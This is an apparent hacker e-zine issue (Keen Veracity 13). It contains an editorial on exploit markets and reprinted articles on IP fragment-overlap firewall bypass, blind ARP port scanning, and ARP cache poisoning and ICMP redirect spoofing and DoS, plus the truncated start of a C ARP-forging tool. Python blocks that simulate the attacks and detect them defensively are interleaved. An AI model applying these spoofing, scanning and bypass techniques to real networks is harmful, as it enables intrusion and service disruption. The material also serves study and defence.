Keen Veracity Issue 13
--------------------------------------------------------------------------------
_ _ _ _ _
| | / ) | | | | (_)_
| | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _
| |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | |
| | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| |
|_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ |
(____/
--------------------------------------------------------------------------------
I S S U E (13) L e g i o n s o f t h e U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
[CONTENTS]------------------------------------------------------------[CONTENTS]
[1]===========================[Editorial - Archimedes <Archimedes@legions.org> ]
[2]==============[Best of KV Issue 3: Packet Fragmentation Attacks - Dr. Cohen ]
[3]=============[Blind Scanning using ARP - Case/Phriction <phric@legions.org> ]
[4]=[Best of KV Issue 7: Playing redir games with ARP and ICMP - yuri volobuev ]
[5]===========[Best of KV Issue 10: NT Logging - NtWak0 - <ntwak0@safehack.com>]
[6]==[Blackboard 5 Password Enumeration - Case/Phriction - <phric@legions.org> ]
[7]====================[ The InfoSec Art of war - VulnDev - <mark@vulndev.org> ]
[8]=============================[Connect back shell in R - <xonox@b0rken.com> ]
[9]=======================[Insight into: Non-repressive Governments - The Barn]
[10]=========================[Snorting Cisco - Digital Ebola <digi@legions.org>]
[11]====================[Artificial Infosex - Datacide <datacide@inet-sec.org> ]
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
--------------------------------------------------------------------------------
[Editorial]================================[Archimedes <archimedes@legions.org>]
--------------------------------------------------------------------------------
I'm sat here on a Sunday morning, about 12 months after KV13 was meant to be
released with only a few things weighing on my mind (as far as KV readers are concerned).
Please bear in mind that these are only my musings, not always in a coherent order.
Firstly: Oh god my head hurts
Secondly: Oh god my head hurts.
Thirdly: Caffeine
-- some time later --
Well it has been a VERY long time since the last KV release.
What, in my opinion, has changed? (Other than the editor).
Not much. This is what concerns me. There no longer seems to be such an
enthusiasm for exploit development and research from the general community.
Sadly by now most of us know where our "battle lines" are drawn.
Those who don't are going to need to make their minds up soon I fear.
It really isn't that long ago that the security "industry" became a major revenue earner.
What really does concern me is that there are people out there who are more concerned about who
is going to give them the most money for an exploit rather than the side-effects of putting it
into the "public" domain. I have spoken to people, mostly the "next generation", who are VERY
talented and DO have the enthusiasm. However they have debts and see a solution to these debts
as being to sell their goods to "Security" companies.
We know that Microsoft has had "issues" with anti-competitiveness.
We know that Symantec now moderates the bugtraq list.
We can assume that full-disclosure may not be for much longer.
We should ALL BE AWARE that soon, un-licensed InfoSec research may be outlawed.
Is it safe that there are companies receiving information and exploits from all
over the globe, has anyone looked at monopolies within InfoSec?
Imagine a company, Private Exploit Notification & Information Service
They purchase exploits from the "underground".
Now, with a bit of background knowledge we know that <insert embargoed country>
is a major player in exploit research and development.
A lot of which can be linked to government funding.
Does PEN&IS have any <embargoed country> "hackers" which it is sending cash to through Western Union?
Is it paying the government of a country it shouldn't be?
If PEN&IS was being funded by a <non-embargoed countries gov science department> would that be illegal?
<end of imagination>
How do we, as researchers know who we are giving our research to? Are we providing weapons of war?
When will the move towards "Netcentric" warfare mean that exploits, such as holes in BGP,
can be life threatening?
We already win wars by hitting critical infrastructure with HE, that is tactics 101
(read VulnDev's publication below). When will governments be hitting it with -1day's?
Would this explain the motions within the EU to ban exploit research, even including
sections that would make partaking in such style discussions potentially illegal?
Let's hope not.
I truly hope that if your eyes are not open, they will be soon.
Hence, it is my honour bound duty to present to you,
Keen Veracity 13
(albeit a partially retro version).
(Feel free to applaud, mock, heckle etc.).
My great thanks to those people who gave input (constructive and otherwise) on this issue.
yours,
Archimedes
July 25th 2004
--------------------------------------------------------------------------------
[Packet Fragmentation Attacks]=======================================[Dr. Cohen]
--------------------------------------------------------------------------------
/* From Keen Veracity #3 */
ADVISORY: TCP packet fragment attacks against firewalls and filters
System: TCP/IP networks
Introduction to Packet Fragmentation
Packet fragmentation is the part of the Internet Protocol (IP) suite of
networking protocols that assures that IP datagrams can flow through any
other sort of network. (For details, see Internet Request For Comments 791
(RFC 791), which is available and searchable in electronic form from Info-Sec
heaven on the World-Wide-Web at http://all.net, through gopher service at
all.net, or by ftp service from rs.internic.net.) Fragmentation works by
allowing datagrams created as a single packet to be split into many smaller
packets for transmission and reassembled at the receiving host.
Packet fragmentation is necessary because, underlying the IP protocol, other
physical and/or logical protocols are used to transport packets through
networks. A good example of this phenomenon is the difference between
Ethernet packets (which are limited to 1024 bytes), ATM packets (which are
limited to 56 bytes), and IP packets, which have variable sizes up to about
1/2 million bytes in length.
The only exception to this rule is in the case of an internet datagram
marked "don't fragment". Any internet datagram marked in this way is
supposed to not be fragmented under any circumstances. If internet
datagrams marked "don't fragment" cannot be delivered to their destination
without being fragmented, they are supposed to be discarded instead. Of
course, this rule doesn't have to be obeyed by the IP software actually
processing packets, but it is supposed to be.
How Packet Reassembly Attacks Work
The packet fragmentation mechanism leads to attacks that bypass many
current Internet firewalls, but the reason these attacks work is not
because of the way fragmentation is done, but rather because of the way
datagrams are reassembled.
Datagrams are supposed to be fragmented into packets that leave the header
portion of the packet intact except for the modification of the fragmented
packet bit and the filling in of an offset field in the IP header that
indicates at which byte in the whole datagram the current packet is
supposed to start. In reassembly, the IP reassembler creates a temporary
packet with the fragmented part of the datagram in place and adds incoming
fragments by placing their data fields at the specified offsets within the
datagram being reassembled. Once the whole datagram is reassembled, it is
processed as if it came in as a single packet.
According to the IP specification, fragmented packets are to be reassembled
at the receiving host. This presumably means that they are not supposed to
be reassembled at intermediate sites such as firewalls or routers. This
decision was made presumably to prevent repeated reassembly and
refragmentation in intermediate networks. When routers and firewalls
followed the rules, they found a peculiar problem.
The way firewalls and routers block specific services (such as telnet)
while allowing other services (such as the world wide web http service) is
by looking into the IP packet to determine which Transfer Control Protocol
(TCP) port is being used. If the port corresponds to 80, the datagram is
destined for http service, while port 23 is used for telnet. In normal
datagrams, this works fine. But suppose we didn't follow the rules for
fragmentation and created improper fragmented packets? Here's what one
attacker did:
* Create an initial packet which claims to be the first fragment of a
multi-packet datagram. Specify TCP port 80 in the TCP header so it
looks like a datagram going to http service, which is allowed to pass
the firewall.
* The firewall passes the packet to the host under attack and passes
subsequent packet fragments in order to allow the destination host to
reassemble the packet.
* One of the subsequent packets has an offset of 0, which causes the
reassembler to overwrite the initial part of the IP packet. This is
the part of the IP packet that specifies the TCP port. The attacker
overwrites the port number, which was originally 80, with a new port
number such as 23, and is now granted telnet access to the host under
attack despite the firewall that is supposed to block the service.
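The overwrite in that last step, and the two checks that stop it, are easy to see in a small simulation. The following is an added example, not code from the advisory: a toy reassembler that copies fragments at their byte offsets (real IP offsets are counted in 8-byte units, which changes nothing here because the TCP ports sit in the first four bytes), a filter that inspects only the first fragment the way the firewall in the advisory does, and the two defences: a reassembler that refuses overlapping fragments, and a filter that drops any later fragment touching the transport header (the rule from RFC 1858). All packets are constructed inline.

```python
"""Toy IP fragment reassembly: the overlap attack and two defences.

Constructed example, not code from the advisory. Offsets are in bytes for
readability; real IP fragment offsets are in 8-byte units.
"""
import struct


class OverlapError(ValueError):
    """A fragment tried to write bytes that an earlier fragment already filled."""


def tcp_header(src_port, dst_port):
    """Minimal 20-byte TCP header (SYN, no options) with the given ports."""
    return struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0x02, 8192, 0, 0)


def dst_port(data):
    """Destination port as a filter or reassembler would read it (bytes 2-3)."""
    return struct.unpack("!H", data[2:4])[0]


def reassemble(fragments, allow_overlap=True):
    """Rebuild the transport payload from (offset, bytes) fragments.

    allow_overlap=True mimics the reassembler in the advisory: a later
    fragment is simply copied over whatever already sits at its offset.
    allow_overlap=False is the mitigation: any fragment that touches a byte
    already received is rejected outright.
    """
    size = max(off + len(data) for off, data in fragments)
    buf = bytearray(size)
    filled = bytearray(size)            # 1 where a byte has been written
    for off, data in fragments:
        end = off + len(data)
        if not allow_overlap and any(filled[off:end]):
            raise OverlapError(f"fragment at offset {off} overlaps received data")
        buf[off:end] = data
        filled[off:end] = b"\x01" * len(data)
    if not all(filled):
        raise ValueError("incomplete datagram: fragments do not cover every byte")
    return bytes(buf)


def attack_fragments():
    """The train from the advisory: a first fragment that looks like HTTP,
    then a second fragment at offset 0 that rewrites the ports to telnet."""
    first = tcp_header(40000, 80) + b"GET / HTTP/1.0\r\n"
    rewrite = tcp_header(40000, 23)[:8]     # ports + sequence number only
    return [(0, first), (0, rewrite)]


def naive_filter(fragments, allowed_port=80):
    """Looks only at the fragment carrying the TCP header (the first one)."""
    return dst_port(fragments[0][1]) == allowed_port


def hardened_filter(fragments, allowed_port=80, header_len=8):
    """Inspects every fragment that could touch the transport header.

    Rule, after RFC 1858: exactly one fragment may start at offset 0, it must
    carry at least the ports, and its port must be allowed; any further
    fragment starting inside the first header_len bytes is dropped, whatever
    port it claims.
    """
    header_seen = False
    for off, data in fragments:
        if off == 0:
            if header_seen or len(data) < 4 or dst_port(data) != allowed_port:
                return False
            header_seen = True
        elif off < header_len:      # would overlap the header without carrying one
            return False
    return header_seen
```

Running the attack train through `naive_filter` allows it while `reassemble` yields port 23; `hardened_filter` rejects it and `reassemble(..., allow_overlap=False)` raises `OverlapError`, whereas a benign split at offset 23 passes both.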
--------------------------------------------------------------------------------
[Blind Scanning using ARP]===========================[Case <phric@legions.org> ]
--------------------------------------------------------------------------------
With people becoming more and more aware of security threats every day,
new measures need to be constantly taken to bypass these security measures. I
am not writing this paper as a black hat or white hat but as someone who
chooses to freely disseminate information to the public; whether it be of a
benign or malignant nature is of no consequence.
##### Normal Scanning techniques #####
Port scanning has gradually progressed over the years, starting out from
something as simple as telneting to individual ports, to programs or scripts that make
connect calls, and advancing to custom crafted packets that use inherent weaknesses
in protocols to glean information about hosts. NMAP, being the most popular and
efficient tool, takes advantage of scanning techniques such as SYN, SYN/ACK, FIN,
RST, NULL and so called XMAS scans. These scans have gained great popularity and
are used frequently in probably almost all port scans today. The new technique of
scanning I will show you soon is blind port scanning, including IPID scanning,
which is a feature in NMAP, and a new technique I recently discovered, BARP or
Broadcast ARP scanning: like a BURP you can't see it, but sometimes you can feel
the effects.
Using normal TCP flag probing one can use a technique affectionately termed
decoy by NMAP. This technique is performed by sending packets with fake source
host addresses along with your own packets to mask where the apparent scan is
coming from. Though this technique can work quite well, the scan can still usually be
traced back to one of two or three computers, unless you used 100 decoys, in which case
the time it took to perform the scan would slow down significantly.
BARP scanning uses the TCP FIN, TCP NULL or TCP XMAS scanning techniques,
along with perhaps a TCP ACK scan to see if ports are filtered. The reason we
use FIN, NULL and XMAS is that when a port is probed with one of these types of
packets, the port in question should return a RST if the port is closed or
nothing if it is open. The host should, mind you, act this way, and we will
assume it does for this paper as we describe BARP scanning later.
##### Blind Port Scanning techniques #####
Blind port scanning techniques are based on the premise that you do not
actually have to send a packet from your host to the target host and have
it return the packet to your host. Instead, in some way you manipulate a packet
to exploit features in protocols. In this paper I will cover IPID scanning and
finally BARP scanning.
##### IPID Scanning #####
IPID scanning or idle host scanning is a blind port scanning technique
taking advantage of a predictably incremented IP ID value in a packet. To do
this, a person finds an idle host, host idle, and forges packets from host idle
to target host. Now if we perform a SYN scan on target host and the port is
closed, it will send a RST packet back to host idle, which will drop it, end
of story. But if the port is open, a subsequent SYN/ACK will be sent to host idle,
and host idle will reply to target host with a RST to end the communication,
involuntarily incrementing its IP ID value. So after each forged packet we
send from host idle to target host we probe host idle's IP ID number to see
if it has incremented. Check out NMAP and papers written by Fyodor for more
information on this subject. http://www.insecure.org/nmap
##### BARP Scanning #####
BARP scanning is based on the concept that when a packet is sent from host
A to nonexistent host B, the host one hop before host B will send an ARP broadcast in an effort
to locate host B. Voila, commence BARP scans. So we should now
understand the basic concept and be able to exploit this feature to perform
blind port scans or ping scans. First we find a host on our subnet that does not exist,
host none. Now we forge a FIN packet from host none to our target host.
And we wait and listen for ARP broadcasts. Now if we receive a broadcast looking
for the hardware address of host none, we know that the target host must have sent a packet
back. Since FIN packets only return RSTs when the ports are closed, we have found a closed
port. Now if on the next packet sent no ARP broadcast is
snooped, we know that the port is most likely open. The magic of great blind
scans begins. The problem is the scan can be narrowed down to your subnet; the benefit is
that it can be one of 253 computers. Now you can perform anonymous port scans on any
host! The hardware address in the ethernet header of the packet before it hits the first
router might be your only concern if it is logged, so don't bequeath the task of taking
out .govs and .microsoft.coms, grasshopper, until understood you have this fact and care
you have taken of it.
I'm a chunky monkey from funkytown...
code at: http://www.legions.org/~phric/arpscan.c
Questions comments email phric@legions.org.
--------------------------------------------------------------------------------
[Playing redir games with ARP and ICMP]==========================[yuri volobuev]
--------------------------------------------------------------------------------
/* From Keen Veracity #7 */
[ -Intro- ]
There're bugs and there're features. All too often the distinction between
the two is in the eye of the beholder. I'd like to show how two legitimate
protocols, ARP and ICMP, while properly implemented, can be used to achieve
something which is, well, not desirable.
While passive attacks (sniffing) that take advantage of the root access to
LAN are extremely popular and every half-way decent root kit has some kind
of a net sniffer, active attacks are not nearly as widespread. Yet, active
participation in the life of your LAN may bring lots of fun and joy. You
knew that already, it's just that technical details had been somewhat
obscure. So, let there be more light.
Possibilities outlined here include spoofing and DoS. While other means of
spoofing, such as IP blind spoofing, are more general and powerful, in terms
of who can use them, they require quite a lot of (guess)work and may be hard
to implement. ARP spoofing, on the contrary, is very easy and robust.
While ARP spoofing is only possible on a local network, it may be a serious
concern as a way to extend an already existing security breach. If somebody
can break into one machine on a subnet, ARP spoofing can be used to
compromise the rest of it.
[ -Background on ARP- ]
[well, originally I wrote a few paragraphs outlining ARP, but then I figured
that if you didn't know how it works already, you'll need to learn it from a
better source. I recommend "TCP/IP Illustrated" by W. Richard Stevens.]
[ -What can be done- ]
Let's consider a hypothetical network
IP        10.0.0.1   10.0.0.2   10.0.0.3   10.0.0.4
hostname  cat        rat        dog        bat
hw addr   AA:AA      BB:BB      CC:CC      DD:DD     (for short)
all connected by Ethernet in some simple way (i.e. no switches, no smart
hubs). You're on cat, you have root and desire to break into dog. You know
that dog trusts rat, so if you can successfully spoof rat, something can be
gained.
First thing that comes to mind (I think everybody was thinking about this at
some point) is "why don't I set my IP to the IP of that other machine
and..." That won't work, at least it won't work reliably. If you tell the
Ethernet driver on cat that its IP is 10.0.0.2, it'll start answering ARP
requests to that IP. But so will rat. It's a pure race condition, and
there's no winner. However, you can easily be the loser, because this
particular situation happens quite often when some box is misconfigured to
use somebody else's IP, so many implementations immediately notice that and
loudly complain. Many network traffic analyzers flag that, too. Seeing a
syslog message saying something nasty (mentioning cat's Ethernet address) on
the LAN admin's console is not quite what you want. And what you want you
won't necessarily get, that is, anything remotely close to a working
connection.
This of course can be helped. The attached program, send_arp.c, can be a
useful tool. Just as its name says, it sends an ARP packet [ARP reply, to
be exact: since the protocol is stateless, the reply will be happily accepted
even if no one ever asked for it. A request would do just as well, though,
because of the ARP caching logic] to the net, and you can make this packet
whatever you want. What you want is an ability to specify source and
target IP and hardware addresses.
First, you don't want your Ethernet driver to talk too much, and it's easy
to accomplish with ifconfig -arp. Of course, it'll need ARP info anyway, so
you'll have to feed it to the kernel manually with arp(8). The critical
part is convincing your neighbours. In the case being described here, you
want dog to believe that rat's hardware address is that of cat (AA:AA), so
you send ARP reply with source IP 10.0.0.2, source hw address AA:AA, target
IP address 10.0.0.3 and target hardware address CC:CC. Now, for all dog
knows, rat is at AA:AA. Cache entry would expire, of course, so it needs to
be updated (request needs to be resent). How often depends on the
particular system, but every 40 sec or so should be sufficient for most
cases. Send it more often if you want, it won't hurt.
A complication here could come from an ARP caching implementation feature.
Some systems (e.g. Linux) would try to update their cache entries by sending
a unicast ARP request to the cached address (like your wife calling you just
to make sure you're there). Such a request can screw things up, because it
could change victim's ARP entry that we just faked, so it must be prevented.
This can be accomplished by feeding the "wife" system with replies so that
it never has to ask for it. Prevention is the best cure, as always. This
time, a real packet from dog to rat should be sent, it's just that cat will
be sending it, not dog, but for rat there's no way to tell. Again, doing it
about every 40 sec is usually OK.
So the procedure is simple. Bring up an alias interface, e.g. eth0:1 (or
use your current one, whatever), with rat's IP and ARP on -- you need to set
up some cache entries first, and it won't work on non-arp interface. Set up
a host route entry for dog through the right interface. Set up a cache
entry for dog, turn off arp, and it's all set.
Now, inject the venom with send_arp (hitting both dog and rat) and for all
dog knows, you're on rat. Just remember to keep sending those ARP packets
to dog and rat.
This attack only works on the local network, of course (in general, it can
reach as far as ARP packets can get, usually not too far because ARP packets
are almost never routed). But an interesting extension here is taking this
outside by replacing dog's hardware address in the above plan with the
router's. If it works (I'm not sure it always will, router's ARP
implementation may be tougher to fool, and since I don't want to try it on
real routers, I don't know, but there's no simple reason why not) you can
easily impersonate any machine on the local network to the rest of the
world. So the target machine could really be anywhere, but the machine
you're impersonating must be on the same LAN.
[ -What else can be done- ]
Aside from spoofing, there's a range of other things you can do with ARP. The
sky is really the limit here. DoS is the most obvious application.
Feeding a victim a wrong hardware address is a powerful way to make it mute.
You can prevent it from talking to any particular machine (and ARP cache
size usually allows for the whole network to fit in, so effectively you can
stop it from talking to everybody for some time). The obvious target would be
the router. Cache poisoning again should be two-way: both the victim system
and the system you don't want the victim to talk to should be fed. The simplest
case would be feeding a non-existent address. It's not the most efficient,
though, as the system will quickly realize that it's talking to nobody and
send out an ARP request. Of course, your next drop of poison will nullify
this, but you have to do it quite often. A more efficient approach here is
feeding the victim with the hardware address of the wrong machine, which
itself is alive and well. Again, it depends on the particular situation, but
very often what happens is that the victim keeps sending out packets of various
types that arrive at the wrong destination, and the destination system will
promptly send ICMP Xxx Unreachable messages back, thus emulating a
connection in some perverted way. This pseudo-connection can easily postpone
cache expiry. On Linux, for example, a pseudo-connection raises cache expiry
from the usual 1 min to about 10 min. By that time, most or all TCP connections
are screwed up. Could be quite annoying. This way, one ARP packet can screw
someone.
An interesting twist here is so-called "gratuitous ARP". It's when the
source and target IPs in the ARP request are the same, and it usually
appears in the form of an Ethernet broadcast. Some implementations recognize
it as a special case, that of a system sending out updated information about
itself to everybody, and cache that request. This way one packet could
screw up the entire network. It must be admitted, though, that gratuitous
ARP is not really defined as a part of ARP, so it's up to the vendor to (not)
implement it, and it's becoming increasingly less popular.
ARP is a serious tool for professional practical jokes, too. Just imagine
somebody setting up a relay, or tunnel, in the form of their own machine that
convinced two neighbours to send their packets intended for each other to
the relay's Ethernet address. If the relay just forwards packets to their real
destinations, no one would even notice. However, some simple data stream
modifications could have quite a spectacular effect on one's mental health.
A simple, CPU-inexpensive "filter" could be swapping two random bytes at
irregular long intervals. If it hits the data portion, most of the
checksums won't change, i.e. the data stream would seem to be intact, yet
strange and inexplicable things _will_ happen for no apparent reason.
[ -ICMP redirects- ]
An effect somewhat similar to ARP cache poisoning can be achieved in a
different way, again using a legitimate protocol feature, ICMP route
redirects. Such a redirect is normally sent by the default router to the
system to indicate that there's a shorter route to some particular
destination. Originally, both network and host route redirects were
proposed, but later net redirects were deprecated and now are usually
treated as host redirects. A properly constructed ICMP packet that passes all
sanity checks (it must come from the default router for the destination it's
redirecting, the new router should be on a directly connected network, etc.)
causes a host-route entry to be added to the system routing table.
The concept is just as secure as ICMP itself, i.e. (security)NULL. Spoofing
the router's IP address is simple, and the attached icmp_redir.c does just that.
The Host Requirements RFC states that a system MUST follow ICMP redirects unless
it's a router. And indeed all the systems I've tried happily accept it
(except vanilla Linux 2.0.30, where it's broken; it works in 2.0.29 and
2.0.31pre9, according to Alan Cox).
ICMP redirects present a rather potent DoS. Unlike ARP cache entries, those
host routes won't expire with time. And of course no access to local
network is required, attack can be launched from anywhere. So if the target
system does accept ICMP redirects (and packets can actually reach it) that
system can be stopped from talking to any particular address on the net
(well, not all, but those that aren't on the same subnet with the target).
Nameservers would be an obvious target.
[ -What can be done about it- ]
ARP is a low level protocol and as such is usually hidden from normal people.
LAN admins may be concerned with it at times, but if all goes well no one
pays attention. One can always inspect the contents of the ARP cache using arp(8),
especially if there's some mysterious network problem, but again it's not
the first thing that comes to mind. Even W95 has an arp command, and
remembering about it may be helpful in certain situations. However, if
you're the target of an attack originating from another network via gateway
ARP spoofing, there's no way to tell. Similarly, the host routing table could
be examined to spot ICMP-generated entries (in most versions of route(1)
they are marked with the letter D in the flags field). Just be aware.
The above ARP attack scheme works perfectly for plain old 10Base2 Ethernet.
However, if machines are interconnected in some more advanced way,
particularly using some smart hubs or switches, the attack can be more visible
or even impossible (the same goes for passive attacks). So there's yet another
reason to invest in a good piece of network equipment. A good deal of peace
of mind may just come with it.
In general, however, I personally find it rather sad that things like ICMP
redirects were made a default. First, it's often not necessary because many
networks have very simple structure and there's never a need for anything in
addition to usual routing table. Second, on more sophisticated networks
routing table can be just as well set manually, it's not really such a
dynamic thing, so why do it via ICMP? And finally, it's dangerous, so I
would like to disable it on my systems, even though it'll make them less
compliant with RFC1122. Alas, it may not be easy. On Linux or any other OS
with sources available, I can at least hack the kernel and #define it out.
On Irix 6.2 and possibly other versions one can set icmp_dropredirects=1
with systune (I'm genuinely surprised to see it there, I really am). Other
OSes can be configurable, too, I have no information.
With ARP, we basically face a situation where the problem of name resolution
is solved dynamically without a centralized server. It doesn't have to be
this way. When one wants to map a hostname to an IP, a nameserver is queried or
/etc/hosts is consulted, i.e. there's some static mapping established. I
don't see why a similar thing can't be done with ARP. Ethernet hardware
addresses don't change too often, and when they do change, it won't kill the net
admin to change the corresponding map. Ethernet can be forced into no-arp
mode, you just need to make sure your ARP cache has all the entries made
permanent. As a bonus, this will reduce network traffic somewhat. Standard
procedures can be used to distribute the ARP map, e.g. rdist, rsync (I would say
NIS, but if you use NIS, ARP is probably not your top security concern
anyway). The old tradition of /etc/ethers can be brought back to life. But
getting a kick-ass Ethernet switch still looks better to me (paying for it
does not, though).
And old wisdom still shines bright through time: don't use hostname-only based
auth. Those who do shall have no mercy from the net gods.
cheers,
yuri
P.S. On Firewalls
I anticipate that many of you, having read the section about ICMP, are
already flexing the fingers preparing to write a follow-up explaining that
all those ICMP packets can be filtered out on the firewall, thus it's not a
problem. Please don't. I'm well aware of the concept. And if you feel you
absolutely have to, don't cc the list needlessly.
I have to note that many people use "i have firewall, and I like it,
therefore everyone else should get one or get lost" logic to argue that
certain security problems are less serious because they can be effectively
eliminated by putting a firewall between the protected network and
Internet. While I fully agree that having firewall is very good for
security, I want to note that it's not always possible or effective.
Imagine an environment where all machines are directly connected to
Internet, you have to share subnet with people you don't know who have
vanilla SGI boxes screaming "hack me pleeeease, my vendor did such a great
job of making it eeeeeeasy" all over the place (and sure, these people know
Unix, they've seen it in Jurassic Park... and that would be about it), and
the router to your subnet is controlled by a separate organization. Welcome
to a standard academic environment, where people don't use firewalls. In
fact, in some of those environments one would be useful to protect the
outside world from the people on the inside. Still, people work there, and
use computers, too. And that's where per-host security solutions are
necessary, it's a jungle where every host is for itself. So please, next
time you think "firewall", remember, it's not for everyone.
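The following monitor is an added example, not part of this article, the BARP paper above, or the attached programs. It serves both pieces from the defender's side: it parses raw Ethernet/ARP frames and flags repeated, unanswered who-has requests for an address nobody owns (what a BARP scan leaves on the wire, since the target or its last-hop router keeps trying to resolve the forged, nonexistent source of the FIN probes), and an is-at reply that rebinds an IP already learnt with a different hardware address (the cat/rat/dog cache poisoning described here), plus gratuitous replies. The hosts, MACs and the known-address list are constructed for the demo; on a real LAN the frames would come from a raw socket or a capture file.

```python
"""ARP monitor for a shared-medium LAN (constructed example, not the article's code).

Alerts raised over raw Ethernet/ARP frames:
  "barp-scan"      repeated who-has for an IP that is not allocated and never answered
  "arp-rebind"     an is-at reply that moves a known IP to another hardware address
  "gratuitous-arp" a reply whose sender and target IP are equal (poisons every cache)
All addresses and the known-host list below are made up for the demonstration.
"""
import struct
from collections import defaultdict

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, ethertype
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
OP_REQUEST, OP_REPLY = 1, 2
BROADCAST = b"\xff" * 6


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def ip(s):
    return bytes(int(x) for x in s.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sha, spa, tha, tpa):
    """Raw 42-byte frame; requests go to the broadcast MAC, replies to tha."""
    dst = BROADCAST if op == OP_REQUEST else mac(tha)
    return (ETH_HDR.pack(dst, mac(sha), ETHERTYPE_ARP)
            + ARP_HDR.pack(1, 0x0800, 6, 4, op, mac(sha), ip(spa), mac(tha), ip(tpa)))


def parse_arp(frame):
    """(op, sender MAC, sender IP, target MAC, target IP), or None if not Ethernet/IPv4 ARP."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _, _, ethertype = ETH_HDR.unpack_from(frame)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa)


class ArpMonitor:
    def __init__(self, known_hosts, scan_threshold=3):
        self.known = set(known_hosts)        # IPs really in use on this subnet
        self.threshold = scan_threshold      # unanswered who-has before alerting
        self.unanswered = defaultdict(int)   # target IP -> who-has count
        self.cache = {}                      # IP -> MAC learnt from replies
        self.alerts = []                     # (kind, ip, detail)

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return
        op, sha, spa, tha, tpa = parsed
        if op == OP_REQUEST:
            if tpa not in self.known:
                self.unanswered[tpa] += 1
                if self.unanswered[tpa] == self.threshold:
                    self.alerts.append(("barp-scan", tpa, sha))
        elif op == OP_REPLY:
            self.unanswered.pop(spa, None)   # somebody answered, so the host exists
            if spa == tpa:
                self.alerts.append(("gratuitous-arp", spa, sha))
            old = self.cache.get(spa)
            if old is not None and old != sha:
                self.alerts.append(("arp-rebind", spa, f"{old}->{sha}"))
            self.cache[spa] = sha


def demo():
    """Constructed traffic on the article's 10.0.0.x LAN; returns the alerts raised."""
    mon = ArpMonitor({"10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4", "10.0.0.254"})
    gw = "00:00:0c:00:00:fe"                 # made-up router MAC at 10.0.0.254
    frames = [
        # rat (BB:BB) answers dog's normal lookup: the cache learns 10.0.0.2 -> bb:..
        build_arp(OP_REPLY, "bb:bb:bb:bb:bb:bb", "10.0.0.2", "cc:cc:cc:cc:cc:cc", "10.0.0.3"),
        # the router asks three times for 10.0.0.77, an address nobody owns: the
        # RSTs provoked by a BARP scan's forged FIN probes need its hardware address
        build_arp(OP_REQUEST, gw, "10.0.0.254", "00:00:00:00:00:00", "10.0.0.77"),
        build_arp(OP_REQUEST, gw, "10.0.0.254", "00:00:00:00:00:00", "10.0.0.77"),
        build_arp(OP_REQUEST, gw, "10.0.0.254", "00:00:00:00:00:00", "10.0.0.77"),
        # cat (AA:AA) tells dog that rat's IP now lives at cat's hardware address
        build_arp(OP_REPLY, "aa:aa:aa:aa:aa:aa", "10.0.0.2", "cc:cc:cc:cc:cc:cc", "10.0.0.3"),
    ]
    for frame in frames:
        mon.feed(frame)
    return mon.alerts
```

A static ARP map (the /etc/ethers approach suggested below) makes the rebind check exact: compare each reply against the map instead of against what was learnt from earlier traffic.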
CUT HERE
/* send_arp.c
This program sends out one ARP packet with source/target IP and Ethernet
hardware addresses supplied by the user. It compiles and works on Linux
and will probably work on any Unix that has SOCK_PACKET.
The idea behind this program is a proof of a concept, nothing more. It
comes as is, no warranty. However, you're allowed to use it under one
condition: you must use your brain simultaneously. If this condition is
not met, you shall forget about this program and go RTFM immediately.
yuri volobuev'97
volobuev@t1.chem.umn.edu
*/
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>    /* bzero(), bcopy() */
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>  /* u_char, u_short */
#include <sys/socket.h>
#include <netinet/in.h> /* instead of <linux/in.h>, which clashes with the libc headers */
#include <arpa/inet.h>
#include <linux/if_ether.h>
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2 /* opcode 2 is an ARP reply, which is what the text says this sends */
#define DEFAULT_DEVICE "eth0"
char usage[]={"send_arp: sends out custom ARP packet. yuri volobuev'97\n\
\tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr\n\n"};
struct arp_packet {
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
